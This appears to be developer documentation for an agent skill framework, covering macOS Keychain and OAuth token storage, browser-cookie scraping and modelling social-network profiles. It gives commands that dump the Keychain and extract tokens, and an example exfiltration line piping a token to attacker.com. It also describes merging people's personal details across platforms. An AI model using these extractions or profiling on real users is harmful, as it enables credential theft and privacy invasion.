for dir in /Applications /Applications/Setapp ~/Applications /System/Applications; do
[ -d "$dir" ] || continue
for app in "$dir"/*.app; do
result=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
[ -n "$result" ] && echo "$(basename $app .app) ($dir): $result"
done
done
Real-world example: BusyContacts and Strongbox are Setapp apps — they live in
/Applications/Setapp/ and are invisible to a top-level-only scan.
Local traces:
Info.plistURL scheme (always present while installed)- Keychain entry with per-account OAuth tokens (e.g.
"svce" = "Mimestream: user@example.com")
Pattern 2: macOS Internet Accounts (Account.framework)
When you add a Google account in System Settings → Internet Accounts, macOS registers it at the OS level. This shows up as “macOS” in Google’s authorized apps list. Calendar, Contacts, Mail, and third-party apps that delegate to the system (like BusyContacts for CardDAV) all use this connection.
The accounts live in a SQLite database:
~/Library/Accounts/Accounts4.sqlite (macOS 15+)
~/Library/Accounts/Accounts5.sqlite (some macOS versions)
Detection: Query the ZACCOUNT / ZACCOUNTTYPE tables:
import sqlite3
conn = sqlite3.connect(f"file:{accounts_db}?mode=ro", uri=True)
cursor = conn.cursor()
cursor.execute("""
SELECT a.ZUSERNAME, t.ZIDENTIFIER
FROM ZACCOUNT a
LEFT JOIN ZACCOUNTTYPE t ON a.ZACCOUNTTYPE = t.Z_PK
WHERE t.ZIDENTIFIER = 'com.apple.account.Google'
""")
Requires Full Disk Access — ~/Library/Accounts/ is protected by macOS
TCC. The process reading it (Terminal, VS Code, the AgentOS engine) must have
Full Disk Access granted in System Settings → Privacy & Security.
Local traces:
- Rows in
Accounts4.sqlitewith typecom.apple.account.Google - Child accounts for CalDAV, CardDAV, IMAP, SMTP under the parent Google entry
Pattern 3: Server-side OAuth (vendor backend)
Apps like Spark (Readdle) authenticate through their vendor’s backend server. The user authorizes Readdle’s server-side OAuth app in their browser, and the server manages the Google tokens. The local app communicates with the vendor server, not directly with Google.
This pattern is invisible to local scanning. There’s no Google client ID in Info.plist, no OAuth token in the Keychain. The only local traces are:
"svce" = "SparkDesktop" "acct" = "RSMSecureEnclaveKey"
"svce" = "com.readdle.spark.account.auth" "acct" = "RSMSecureEnclaveKey"
These are Secure Enclave keys for the app’s own auth — they don’t contain Google tokens, they protect the app’s session with Readdle’s servers.
Detection: No reliable local detection. The only way to see these is to
query Google’s OAuth management API or check myaccount.google.com/permissions
directly.
Ghost entries: When server-side OAuth apps are uninstalled, the Keychain entries remain but the app bundle is gone. The Google authorization also persists (the vendor server still has the tokens) until the user explicitly revokes it in Google’s settings.
Summary
| Pattern | Examples | How to detect | Shows in Google as |
|---|---|---|---|
| Native PKCE | Mimestream, BusyContacts, Strongbox | Info.plist URL scheme scan | App name |
| macOS Internet Accounts | Calendar, Contacts, Mail | Accounts4.sqlite (needs FDA) | “macOS” |
| Server-side OAuth | Spark, potentially others | Not locally detectable | Vendor name (Readdle) |
Finding Google OAuth Client IDs (Native PKCE)
The detailed walkthrough for Pattern 1 above. The registered URL scheme in
Info.plist encodes the client ID:
plutil -p /Applications/SomeApp.app/Contents/Info.plist | grep googleusercontent
Client secrets in binaries
Google OAuth client secrets for desktop apps begin with GOCSPX-. You can
search binaries with:
strings /Applications/SomeApp.app/Contents/MacOS/SomeApp | grep "GOCSPX-"
However, Google explicitly treats desktop app client secrets as non-secret. The Google docs say: “The client secret is not secret in this context.” Desktop apps are “public clients” — the secret is in the binary, reversible, and Google knows it.
What actually protects the user is:
- The refresh token being user-specific and Keychain-stored
- PKCE preventing one-time auth code interception (see below)
- Google’s revocation flow (
myaccount.google.com/permissions)
Full Credential Audit
To audit everything sensitive on the machine:
# 1. All non-Apple Keychain entries (service + account names)
security dump-keychain 2>/dev/null \
| grep '"svce"\|"acct"' \
| grep -iv "apple\|icloud\|cloudkit\|wifi\|bluetooth\|cert\|nsurl\|networkservice\|airportd\|safari\|webkit\|xpc\|com\.apple\." \
| sort -u
# 2. Apps with Google OAuth client IDs (all install locations)
for dir in /Applications /Applications/Setapp ~/Applications; do
[ -d "$dir" ] || continue
for app in "$dir"/*.app; do
r=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
[ -n "$r" ] && echo "$(basename $app .app) ($dir): $r"
done
done
# 3. Apps using the Electron Safe Storage pattern
security dump-keychain 2>/dev/null | grep "Safe Storage"
# 4. Apps with direct token entries
security dump-keychain 2>/dev/null \
| grep '"svce"' \
| grep -iE "token|auth|key|secret|credential|oauth|refresh|access"
Extracting a Specific Token
Once you know the service name and account name from the audit:
# Returns the raw value (password field)
security find-generic-password -s "SERVICE_NAME" -a "ACCOUNT_NAME" -w
For apps that store binary plists (like Mimestream):
security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w
# Returns hex-encoded binary plist
# Decode: xxd -r -p <<< "$HEX" | plutil -convert json - -o -
This is exactly how the mimestream.credential_get skill works — command: step
runs the security command, plist: step decodes the binary plist.
Keychain ACLs — Why Most Items Are Readable
macOS Keychain has two access levels:
| Level | Behavior | Who uses it |
|---|---|---|
| No ACL (default) | Any process running as the same user can read silently | Most apps |
| ACL-protected | macOS prompts “Allow / Deny / Always Allow” | 1Password, some system services |
The ACL-protected dialog looks like:
"SomeApp" wants to use your confidential information stored in "item name" in your keychain.
[Deny] [Allow] [Always Allow]
Most apps don’t set ACLs. The Keychain is protected against:
- Other user accounts on the same machine
- Sandboxed App Store apps (they can only access items they created)
- Remote attackers
It is not protected against:
- Processes running as the same user (same UID)
- Malicious code injected via supply chain attacks
- Any script or tool run in your Terminal session
How the Keychain Is Actually Encrypted
The login keychain (~/Library/Keychains/login.keychain-db) is an encrypted
SQLite file, but your processes never decrypt it directly. The OS handles this
through a privileged daemon called securityd.
Key derivation chain:
Login password
↓ PBKDF2 (salt stored in the .keychain-db file)
Master encryption key ←── held in securityd memory after login
↓ wraps
Per-item encryption keys
↓ decrypts
Item plaintext values
When you log in, macOS unlocks the keychain and securityd holds the master
key in memory for the session. The security CLI and Security.framework API
talk to securityd — they never read raw bytes from the file. securityd
checks ACLs, then hands back plaintext to any authorized caller.
Why your session already has full access: No password is needed at runtime
because securityd has the master key in memory from login. Any process you
launch inherits your UID, which is all securityd checks for no-ACL items.
The offline copy attack: Because PBKDF2 is deterministic (same
password + same salt → same master key, on any machine), copying the
.keychain-db file and running security unlock-keychain -p "password" <file>
decrypts it fully — no active session needed. File + password = complete access.
Secure Enclave — The Real Hardware Boundary
Touch ID-gated items (kSecAccessControlUserPresence) use a fundamentally
different mechanism: the Secure Enclave coprocessor.
Secure Enclave key ←── hardware-bound, NEVER extractable, tied to this chip
↓ wraps
Item encryption key (stored in .keychain-db, but useless without the Enclave key)
↓ decrypts
Item plaintext value
The Enclave key cannot be exported, dumped, or migrated. Touch ID just proves “user is present” to the Enclave, which unwraps the key inside hardware and returns the plaintext. This is the only mechanism where copying the file + knowing the password is not sufficient — the Enclave key lives on a specific chip and nowhere else.
Access matrix:
| Item type | Active session (no password) | File copy + password | Different machine |
|---|---|---|---|
| No ACL | ✅ silent | ✅ works | ✅ works |
| App ACL | ✅ with prompt | ✅ works | ✅ works |
Touch ID (UserPresence) | ✅ prompts Touch ID | ❌ | ❌ never |
The Secure Enclave is the only real hardware-enforced wall. Everything else
is securityd policy, which any same-user process can request through.
Supply Chain Attack Surface
If malicious code runs as the user (e.g. via a compromised npm package or a malicious skill), it can silently read any non-ACL Keychain item:
# A malicious command step in a skill.yaml could do:
security find-generic-password -s "cursor-refresh-token" -w | \
curl -sX POST https://attacker.com -d @-
What’s reachable in a typical developer’s Keychain:
| Token | What it grants | Lifetime |
|---|---|---|
| Google refresh token (Mimestream) | Read/send email, calendar | Until revoked |
GitHub CLI token (gh:github.com) | Full repo access | Until revoked |
| Cursor tokens | IDE session, code context | Until expired/revoked |
| Electron Safe Storage key | Decrypt all browser-stored credentials | Until app reinstalled |
| Slack Safe Storage key | Decrypt all local Slack data | Until app reinstalled |
Implication for AgentOS: Skills with command: steps can execute arbitrary
shell commands. Before a public skill registry exists, command: steps in
community skills should be audited for Keychain access. See
docs/specs/_roadmap.md — skill
sandboxing is a listed backlog item.
PKCE — What It Actually Protects
PKCE (Proof Key for Code Exchange) is required for modern desktop OAuth. It is narrower than it sounds.
What it protects: One-time authorization code interception. During the ~10-second window between “user clicks Approve” and “app exchanges the code”, a process could theoretically grab the code off the localhost redirect (port squatting). PKCE makes that useless because the code can’t be exchanged without the verifier, which lives only in the legitimate app’s memory for that window.
What it does not protect: The refresh token sitting in the Keychain. Once the initial auth is done, PKCE is irrelevant. The refresh token is the real long-lived credential and it’s protected only by Keychain access controls (see above).
PKCE protects: PKCE does NOT protect:
────────────── ──────────────────────
auth code (10 sec) refresh token (months)
during initial login ongoing token renewal
The verifier is never written to disk — it lives in memory for the duration of the login flow and is discarded. This is by design: it only needs to survive the seconds between opening the browser and catching the redirect.
See Also
- Electron deep dive — Safe Storage key extraction, asar unpacking
- Auth & Credentials overview — web auth, CSRF, cookie patterns
- Desktop Apps — app bundle structure, Application Support
skills/mimestream/skill.yaml— reference implementation of Keychain-based OAuth credential extraction
Reverse Engineering — Content Extraction from HTML
When there’s no API, no GraphQL, no Apollo cache — just server-rendered HTML
behind a login wall. This doc covers the patterns for authenticated HTML scraping
with agentos.http + lxml.
This is Layer 4 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport — getting a response at all
- Layer 2: Discovery — 2-discovery — finding structured data in bundles
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
- Layer 4: Content (this file) — extracting data from HTML when there is no API
- Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
When You Need This Layer
Not every operation needs HTML scraping. The same site often has a mix:
| Data type | Approach | Example |
|---|---|---|
| Public catalog data | GraphQL / Apollo cache (Layer 2) | Goodreads book details, reviews, search |
| User-scoped data behind login | HTML scraping (this doc) | Goodreads friends, shelves, user’s books |
| Write operations | API calls with session tokens | Rating a book, adding to shelf |
Rule of thumb: Check for structured APIs first (Layer 2). Only fall back to HTML scraping when the data is exclusively server-rendered behind authentication.
Skill Architecture: Two Modules
When a skill needs both public API access and authenticated scraping, split into two Python modules:
skills/mysite/
readme.md # Skill descriptor — operations point to either module
public_graph.py # Public API / GraphQL / Apollo — no cookies needed
web_scraper.py # Authenticated HTML scraping — needs cookies
The readme declares separate connections for each:
connections:
graphql:
description: "Public API — key auto-discovered"
web:
description: "User cookies for authenticated data"
auth:
type: cookies
domain: ".mysite.com"
optional: true
label: MySite Session
Operations reference the appropriate connection:
operations:
search_books: # public
connection: graphql
python:
module: ./public_graph.py
function: search_books
args: { query: .params.query }
list_friends: # authenticated
connection: web
python:
module: ./web_scraper.py
function: run_list_friends
params: true
Cookie Flow: connection: web → Python
The entire cookie lifecycle is handled by agentOS. The Python script never touches browser databases or knows which browser the cookies came from.
How it works
- Skill declares
connection: webwithcookies.domain: ".mysite.com" - Executor finds an installed cookie provider (
brave-browser,firefox, etc.) - Provider extracts + decrypts cookies from the local browser database
- Executor injects them into params as
params.auth.cookies(aCookie:header string) - Python reads them and passes to
http.client()
Python side
def _cookie(ctx: dict) -> str | None:
"""Extract cookie header from AgentOS-injected auth."""
c = (ctx.get("auth") or {}).get("cookies") or ""
return c if c else None
def _require_cookies(cookie_header, params, op_name):
cookie_header = cookie_header or (params and _cookie(params))
if not cookie_header:
raise ValueError(f"{op_name} requires session cookies (connection: web)")
return cookie_header
params: true context structure
When a Python executor uses params: true, the function receives the full
wrapped context as a single params dict:
{
"params": { "user_id": "123", "page": 1 },
"auth": { "cookies": "session_id=abc; token=xyz" }
}
Use a helper to read user params from either nesting level:
def _p(d: dict, key: str, default=None):
"""Read from params sub-dict or top-level."""
p = (d.get("params") or d) if isinstance(d, dict) else {}
return p.get(key, default) if isinstance(p, dict) else default
HTTP Client: Shared Across Pages
Create one http.client() per operation and reuse it across paginated requests.
This keeps the TCP/TLS connection alive and avoids per-request overhead.
from agentos import http
def _client(cookie_header: str | None) -> http.Client:
headers = http.headers(waf="standard", accept="html")
if cookie_header:
headers["Cookie"] = cookie_header
return http.client(headers=headers)
# Usage
with _client(cookie_header) as client:
for page in range(1, max_pages + 1):
status, html = _fetch(client, url.format(page=page))
if not _has_next(html):
break
Pagination
Default: fetch all pages
Make page=0 the default, meaning “fetch everything.” When the caller passes
page=N, return only that page. This gives callers control without requiring
them to implement their own pagination loop.
def list_friends(user_id, page=0, cookie_header=None, *, params=None):
if page > 0:
# Single page
return _parse_one_page(url.format(page=page), cookie_header)
# Auto-paginate
all_items = []
seen = set()
with _client(cookie_header) as client:
for p in range(1, MAX_PAGES + 1):
status, html = _fetch(client, url.format(page=p))
items = _parse_page(html)
for item in items:
if item["id"] not in seen:
seen.add(item["id"])
all_items.append(item)
if not items or not _has_next(html):
break
return all_items
Detecting “next page”
Look for pagination controls rather than guessing based on result count:
def _has_next(html_text: str) -> bool:
return bool(
re.search(r'class="next_page"', html_text) or
re.search(r'rel="next"', html_text)
)
Safety limits
Always cap auto-pagination (MAX_PAGES = 20). A user with 5,000 books shouldn’t
trigger 200 sequential requests in a single tool call.
Deduplication
Sites often include the user’s own profile in friend lists, or repeat items across page boundaries. Always deduplicate by ID:
seen: set[str] = set()
for item in page_items:
if item["id"] not in seen:
seen.add(item["id"])
all_items.append(item)
HTML Parsing Patterns
Use data attributes over visible text
Data attributes are more stable than CSS classes or visible text:
# Good: data-rating is the source of truth
stars = row.select_one(".stars[data-rating]")
rating = int(stars["data-rating"]) if stars else None
# Bad: fragile, depends on star rendering
rating_el = row.select_one(".staticStars")
Fallback selector chains
Large sites use different HTML structures across pages, A/B tests, and regions. Instead of matching a single selector, define a priority-ordered list and take the first match. This makes parsers resilient to markup changes.
ORDER_ID_SEL = [
"[data-component='orderId']",
".order-date-invoice-item :is(bdi, span)[dir='ltr']",
".yohtmlc-order-id :is(bdi, span)[dir='ltr']",
":is(bdi, span)[dir='ltr']",
]
ITEM_PRICE_SEL = [
".a-price .a-offscreen",
"[data-component='unitPrice'] .a-text-price :not(.a-offscreen)",
".yohtmlc-item .a-color-price",
]
def _select_one(tag, selectors: list[str]):
for sel in selectors:
result = tag.select_one(sel)
if result:
return result
return None
def _select(tag, selectors: list[str]) -> list:
for sel in selectors:
result = tag.select(sel)
if result:
return result
return []
Put the most specific, modern selector first (e.g. data-component attributes)
and the broadest fallback last. This pattern works especially well for sites
like Amazon that ship multiple front-end variants simultaneously.
Reference: skills/amazon/amazon.py — all order/item selectors use this pattern.
Structured table pages (Goodreads /review/list/)
Many sites render user data in HTML tables with class-coded columns. Each <td>
has a field class you can target directly:
rows = soup.select("tr.bookalike")
for row in rows:
book_id = row.get("data-resource-id")
title = row.select_one("td.field.title a").get("title")
author = row.select_one("td.field.author a").get_text(strip=True)
rating = row.select_one(".stars[data-rating]")["data-rating"]
date_added = row.select_one("td.field.date_added span[title]")["title"]
Extraction helpers
Write small focused helpers for each field type rather than inline parsing:
def _extract_date(row, field_class):
td = row.select_one(f"td.field.{field_class}")
if not td:
return None
span = td.select_one("span[title]")
if span:
return span.get("title") or span.get_text(strip=True)
return None
def _extract_rating(row):
stars = row.select_one(".stars[data-rating]")
if stars:
val = int(stars.get("data-rating", "0"))
return val if val > 0 else None
return None
Login detection and SESSION_EXPIRED
Check early and fail fast when cookies are invalid. Use the SESSION_EXPIRED:
prefix convention so the engine can automatically retry with a different cookie
provider (see connections.md):
def _is_login_redirect(resp, body: str) -> bool:
if "ap/signin" in str(resp.url):
return True
if "form[name='signIn']" in body[:5000]:
return True
return "ap_email" in body[:3000] or "signIn" in body[:3000]
# In any authenticated operation:
if _is_login_redirect(resp, body):
raise RuntimeError(
"SESSION_EXPIRED: Amazon redirected to login — session cookies are expired or invalid."
)
The SESSION_EXPIRED: prefix triggers the engine’s provider-exclusion retry:
the engine marks the current cookie provider as stale, excludes it, and retries
with the next-best provider. This handles the common case where one browser has
stale cookies but another has a fresh session.
Convention: SESSION_EXPIRED: <human-readable reason> for stale auth. Any
other exception message means a real failure — the engine won’t retry with
different credentials.
AJAX Endpoints for Dynamic Content
Not everything is in the HTML. Many sites load sections dynamically via internal AJAX endpoints that return HTML fragments or JSON. These are often easier to parse than the full page and more stable across redesigns.
Discovering AJAX endpoints
Use Playwright’s capture_network while interacting with the page:
capture_network { url: "https://www.amazon.com/auto-deliveries", pattern: "**/ajax/**", wait: 5000 }
Or inject a fetch interceptor and click the relevant UI element — the interceptor captures the endpoint, params, and response shape.
Example: Amazon Subscribe & Save
Amazon’s subscription management page loads content via an AJAX endpoint that returns a JSON payload with embedded HTML:
from lxml import html as lhtml
resp = client.get(
f"{BASE}/auto-deliveries/ajax/subscriptionList",
params={"pageNumber": 0},
headers={
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{BASE}/auto-deliveries",
},
)
data = resp.json()
html_fragment = data.get("subscriptionListHtml", "")
doc = lhtml.fromstring(html_fragment)
Key headers for AJAX: Always include X-Requested-With: XMLHttpRequest and
a valid Referer. Many servers check these to distinguish AJAX from direct
navigation.
When to look for AJAX endpoints
| Signal | Likely AJAX |
|---|---|
| Content appears after page load (spinner, lazy-load) | Yes |
| URL changes without full page reload | Yes — check for pushState + fetch |
| Tab/section switching within a page | Yes — each tab may have its own endpoint |
| Data differs between “View Source” and DevTools Elements | Yes — JS loaded it after |
Reference: skills/amazon/amazon.py subscriptions() — AJAX endpoint for
Subscribe & Save management.
Adapter Null Safety
When a skill’s adapter maps nested collections (like shelves on an account),
not every operation returns those nested fields. Use jaq // [] fallback to
prevent null iteration errors:
adapters:
account:
id: .user_id
name: .name
shelves:
shelf[]:
_source: '.shelves // []' # won't blow up when shelves is absent
id: .shelf_id
name: .name
Data Validation Checklist
After building a scraper, cross-reference against the live site:
| Check | How |
|---|---|
| Total count | Compare your result count to what the site header says (“Showing 1-30 of 69”) |
| Unique IDs | Deduplicate and compare — off-by-one usually means a deleted/deactivated account |
| Rating counts | Count items with non-null ratings vs. the site’s “X ratings” display |
| Review counts | Count items with actual review text vs. the site’s “X reviews” display |
| Field completeness | Spot-check dates, ratings, authors against individual entries on the site |
| Shelf math | Sum shelf counts and compare to “All (N)” — they may diverge (Goodreads shows 273 but serves 301) |
Testing Methodology
1. Save cookies locally for development
Extract cookies once and save to a JSON file for local testing:
# From agentOS:
# run({ skill: "brave-browser", tool: "cookie_get", params: { domain: ".mysite.com" } })
# Or manually build the file:
# scripts/test_cookies.json
[
{"name": "session_id", "value": "abc123", "domain": ".mysite.com"},
...
]
2. Test parsers against real pages
Hit the live site with agentos.http and verify parsing before wiring to agentOS:
with open("scripts/test_cookies.json") as f:
cookies = json.load(f)
cookie_header = "; ".join(f'{c["name"]}={c["value"]}' for c in cookies)
friends = list_friends("12345", cookie_header=cookie_header)
print(f"Got {len(friends)} friends")
3. Test through agentOS MCP
Once local parsing works, test the full pipeline:
npm run mcp:call -- --skill mysite --tool list_friends \
--params '{"user_id":"12345"}' --verbose
4. Mark cookie-dependent tests as write mode
Operations that require live cookies should use test.mode: write so they’re
skipped in automated smoke tests but can be run manually with --write:
test:
mode: write
fixtures:
user_id: "12345"
Real-World Examples
| Skill | What’s scraped | Key patterns | Reference |
|---|---|---|---|
skills/amazon/ | Orders, products, subscriptions, account identity — all from server-rendered HTML and AJAX | Fallback selector chains, Siege cookie stripping, session warming, AJAX endpoints, SESSION_EXPIRED convention | amazon.py |
skills/goodreads/ | People (friends, following, followers), books, reviews, groups, quotes, rich profiles — all from HTML | Structured table parsing, data attributes, pagination, dedup | web_scraper.py |
For social-network-specific modeling patterns (person vs account, relationship types, cross-platform identity), see 5-social.
Reverse Engineering — Social Network Patterns
How to model people, relationships, and social data across platforms like Goodreads, Twitter/X, MySpace, LinkedIn, Instagram, etc.
This is Layer 5 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport — getting a response at all
- Layer 2: Discovery — 2-discovery — finding structured data in bundles
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
- Layer 4: Content — 4-content — extracting data from HTML when there is no API
- Layer 5: Social Networks (this file) — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
Core Principle: People First, Accounts Second
Every social platform has users. But the same person exists across many platforms. The graph should model this in two layers:
| Entity | What it represents | Cross-platform? |
|---|---|---|
| person | A real human being | Yes — mergeable across platforms |
| account | Their profile on one platform | No — platform-specific |
A person has accounts. An account belongs to a person.
adapters:
person:
id: .user_id
name: .name
image: .photo_url
location: .location
data.gender: .gender
data.age: .age
data.birthday: .birthday
data.website: .website
has_account:
account:
id: .user_id
name: .name
handle: .handle
url: .profile_url
image: .photo_url
Why this matters: When you later build Twitter and find the same person (by name, website, or explicit cross-link), you can merge the person entities while keeping both accounts distinct. The person is the anchor.
Social Relationship Types
Every social network has some subset of these relationship patterns:
Symmetric (mutual)
Both parties agree. The relationship is bidirectional.
| Relationship | Examples |
|---|---|
| friends | Facebook, Goodreads, MySpace |
Operation pattern: list_friends(user_id) → person[]
Asymmetric (directed)
One party follows, the other may or may not follow back.
| Relationship | Examples |
|---|---|
| following | Twitter, Instagram, Goodreads |
| followers | Twitter, Instagram, Goodreads |
Operation pattern: two separate operations with different directions.
list_following:
description: People this user follows
returns: person[]
list_followers:
description: People following this user
returns: person[]
Group membership
User belongs to a group/community.
| Relationship | Examples |
|---|---|
| member_of | Goodreads groups, Facebook groups, Reddit subreddits, Discord servers |
list_groups:
returns: group[]
Profile Depth: Light vs Rich
Social operations return people at two levels of depth:
Light (from list operations)
When you scrape a friends list or followers page, you get limited data per person:
{
"user_id": "10000001",
"name": "Alex Reader",
"photo_url": "https://...",
"location": "Berlin",
"books_count": 414,
"friends_count": 138,
}
This is what list_friends, list_following, list_followers return.
Enough to create the person entity and the relationship edge.
Rich (from profile scrape)
When you scrape an individual profile page, you get the full picture:
{
"user_id": "10000001",
"name": "Alex Reader",
"handle": "alexreader",
"photo_url": "https://...",
"gender": "...",
"age": 32,
"birthday": "...",
"location": "Berlin, Germany",
"website": "https://example.com",
"about": "...",
"interests": "...",
"joined_date": "January 2015",
"ratings_count": 159,
"avg_rating": "3.82",
"friends_count": 138,
"favorite_books": [...],
"currently_reading": [...],
"favorite_genres": [...],
}
This is what get_person(user_id) returns.
Pattern: Always provide both. The light operations populate the graph with
stubs. The rich operation fills them in when you need the detail. The adapter
handles both — missing fields are just null.
Authors Are People Too
On platforms with content creators (Goodreads authors, Twitter blue-checks, YouTube channels), the creators are people with special roles. Model them as:
- person entity (they’re a human being)
- author/creator entity (their creative identity)
- account entity (their platform presence)
On Goodreads, an author appears in multiple contexts:
| Context | How we encounter them |
|---|---|
Book’s written_by relationship | author entity with ID and URL |
list_following results | person entity (they follow authors) |
| Quote attribution | author entity |
| Author profile page | full author entity with books |
The key insight: extract real author IDs everywhere, not just name strings.
When a book list shows “Christie, Agatha” as a link to /author/show/123715,
capture the ID so the graph can connect the book → author → their other books.
author_el = row.select_one("td.field.author a")
if author_el:
href = author_el.get("href", "")
m = re.search(r"/author/show/(\d+)", href)
if m:
author_id = m.group(1)
author_url = _abs_url(href)
Also fix name ordering — many platforms store names as “LastName, FirstName” in table views:
def _flip_name(name: str) -> str:
if "," in name:
parts = [p.strip() for p in name.split(",", 1)]
if len(parts) == 2 and parts[1]:
return f"{parts[1]} {parts[0]}"
return name
Content People Create
Social platforms aren’t just about connections — people create content. Each platform has its own content types that should map to entities:
| Platform | Content types | Entity mapping |
|---|---|---|
| Goodreads | Books read, reviews, ratings, quotes | book, review, quote |
| Tweets, retweets, likes | post, engagement | |
| MySpace | Music, blog posts, comments | track, post, comment |
| Photos, stories, reels | media, story | |
| Posts, articles, endorsements | post, article |
The person’s relationship to content matters:
# Things a person created
person → wrote → review
person → posted → post
# Things a person engaged with
person → rated → book (with rating value)
person → liked → quote
person → saved → book (to shelf)
# Things attributed to a person
quote → attributed_to → author
book → written_by → author
Profile Page Parsing Patterns
Social profile pages follow remarkably similar structures across platforms. Common patterns:
Info box / details section
Most profiles have a key-value info section:
titles = soup.select(".infoBoxRowTitle")
items = soup.select(".infoBoxRowItem")
info = {}
for t, v in zip(titles, items):
label = clean(t.get_text()).lower()
value = clean(v.get_text())
info[label] = value
Stats bar
Ratings, posts, followers — usually near the top:
stats_text = clean(stats_el.get_text())
ratings = re.search(r"([\d,]+)\s+ratings?", stats_text)
avg = re.search(r"\(([\d.]+)\s+avg\)", stats_text)
Section headers → content blocks
Profile pages have named sections (favorite books, currently reading, groups). The header-to-content relationship varies by platform:
# Pattern 1: Header is inside a container, content is a sibling div
for hdr in soup.select("h2.brownBackground"):
parent_box = hdr.find_parent("div", class_="bigBox")
body = parent_box.select_one(".bigBoxBody") if parent_box else None
# Pattern 2: Header IS the container, content follows
for hdr in soup.select(".sectionHeader"):
body = hdr.find_next_sibling()
# Pattern 3: Header + content share a parent
for section in soup.select(".profileSection"):
title = section.select_one("h3")
content = section.select_one(".sectionContent")
Always check the actual DOM structure — don’t assume.
Pagination for Social Lists
Social lists (friends, followers, following) almost always paginate. Key patterns from Goodreads that will apply elsewhere:
Auto-pagination with page=0
def list_friends(user_id, page=0, ...):
"""page=0 means fetch all pages automatically."""
if page > 0:
return _fetch_single_page(page)
all_items = []
seen = set()
for p in range(1, MAX_PAGES + 1):
items = _fetch_single_page(p)
new = [i for i in items if i["user_id"] not in seen]
all_items.extend(new)
seen.update(i["user_id"] for i in new)
if not _has_next(html_text):
break
return all_items
Next-page detection
def _has_next(html_text: str) -> bool:
return 'class="next_page"' in html_text or "rel=\"next\"" in html_text
Safety limits
Always cap pagination to prevent infinite loops:
MAX_PAGES = 50
Cross-Platform Identity Signals
When building skills for multiple social networks, look for identity signals that help merge person entities across platforms:
| Signal | Reliability | Example |
|---|---|---|
| Explicit cross-link | High | Website URL in bio pointing to another profile |
| Same handle | Medium | @jcontini on both Twitter and Goodreads |
| Same name + location | Low | “Joe Contini, Austin TX” |
| Same profile photo | Medium | Image similarity matching |
| Email (if available) | High | Unique identifier |
For now, just capture everything. The website field on a person’s profile
is particularly valuable — it often links to a personal site that aggregates
all their social profiles.
Checklist for a New Social Network Skill
When building a skill for a new social platform:
- Identify the entity types — what do people create, consume, and engage with?
- Map relationships — friends? followers? groups? what content do they produce?
- Model as person → account — not just accounts
- Light + rich profiles — list operations for stubs, get_person for detail
- Extract real IDs everywhere — not just name strings; follow links for IDs
- Capture cross-platform signals — website, handle, email
- Auto-paginate social lists — friends, followers, etc. are always paginated
- Handle name formatting — “LastName, FirstName” flipping, Unicode, etc.
- Look for section-based profile data — favorite X, currently Y, groups, etc.
- Test with a real profile — verify data richness against what you see in the browser
Real-World Examples
| Skill | Social patterns used | Reference |
|---|---|---|
skills/goodreads/ | person → account, friends, following/followers, groups, quotes, authors as people, favorite books, currently reading, profile scraping | web_scraper.py |
Future: skills/myspace/ | person → account, friends, followers, music, blog posts | — |
Future: skills/twitter/ | person → account, following/followers, tweets, likes, retweets | — |
Reverse Engineering — macOS Desktop & Electron Apps
When the target is a desktop app (Slack, Notion, Granola, VS Code, etc.) that stores data locally and syncs with a backend. The API is often undocumented; the app itself is your best source.
This is Layer 6 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport — TLS, headers, WAF bypass
- Layer 2: Discovery — 2-discovery — web bundles, Apollo cache
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions
- Layer 4: Content — 4-content — HTML scraping
- Layer 5: Social Networks — 5-social — people, relationships
- Layer 6: Desktop Apps (this file) — macOS, Electron, local state, unofficial APIs
- electron.md — Electron deep dive: asar extraction, token files, CrossAppAuth, feature flags
When to Use This Approach
| Target | Approach |
|---|---|
| Web app (browser-based) | Layers 1–4 — bundles, GraphQL, cookies |
| Desktop app with local data | This doc — app bundle + Application Support |
| Hybrid (web + desktop client) | Both — auth may live in desktop, API is same |
Desktop apps often reuse the same backend API as their web counterpart. The desktop client just embeds a token or session that the web version would get from a browser cookie flow. If you find the token, you can call the API directly from Python — no headless browser, no TLS fingerprint games.
Identify the App Stack
Is it Electron?
# Check for the telltale structure
ls -la /Applications/SomeApp.app/Contents/Resources/
# Look for: app.asar (bundled JS) or app/ (unpacked)
Electron apps ship:
app.asar— compressed archive of the app’s JS/HTMLResources/— icons, native modules- Chromium runtime inside
Frameworks/
Find the app support directory
macOS apps store user data under:
~/Library/Application Support/<AppName>/
Common subdirs:
| Directory | What it contains |
|---|---|
*.json (supabase, stored-accounts, local-state) | Auth tokens, config, feature flags |
Cache/, Code Cache/ | Chromium cache (less useful) |
Local Storage/, IndexedDB/ | WebStorage — sometimes has SQLite DBs |
Session Storage/ | Ephemeral state |
blob_storage/ | Binary blobs |
*.json (cache-v6, state) | Entity cache — synced from backend, often the gold |
Auth: Steal the Token
Desktop apps must persist auth somewhere. The user is logged in; the app survives restarts. Find where.
Common patterns
| File pattern | Typical content |
|---|---|
supabase.json, auth.json, tokens.json | JWT access_token, refresh_token |
stored-accounts.json | Account list, sometimes with session data |
Cookies (SQLite) | HTTP-only cookies — harder to extract |
| Keychain | macOS Keychain — use security find-generic-password |
Extraction pattern
from pathlib import Path
import json
APP_SUPPORT = Path.home() / "Library" / "Application Support" / "Granola"
def get_token() -> str:
with open(APP_SUPPORT / "supabase.json") as f:
data = json.load(f)
tokens = json.loads(data["workos_tokens"]) # nested JSON string
return tokens["access_token"]
Tokens often live in nested JSON strings — the outer file is JSON, but
some values (like workos_tokens) are themselves JSON strings. Parse twice.
Token lifetime
Desktop app tokens are often refreshed by the app when it’s running. If your
skill gets 401, the user needs to open the app to refresh. Document this.
Discovery: App Bundle → API Endpoints
The app’s bundled JS contains every API endpoint it calls.
1. Find the app bundle
# macOS: find by name
mdfind "kMDItemDisplayName == 'Granola*'"
